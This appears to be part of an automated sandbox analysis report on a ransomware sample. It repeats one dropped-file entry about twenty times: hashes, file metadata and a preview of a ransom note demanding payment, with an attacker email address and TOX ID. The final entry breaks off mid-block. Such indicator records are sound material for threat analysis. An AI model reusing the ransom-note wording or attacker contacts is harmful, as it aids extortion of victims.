                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
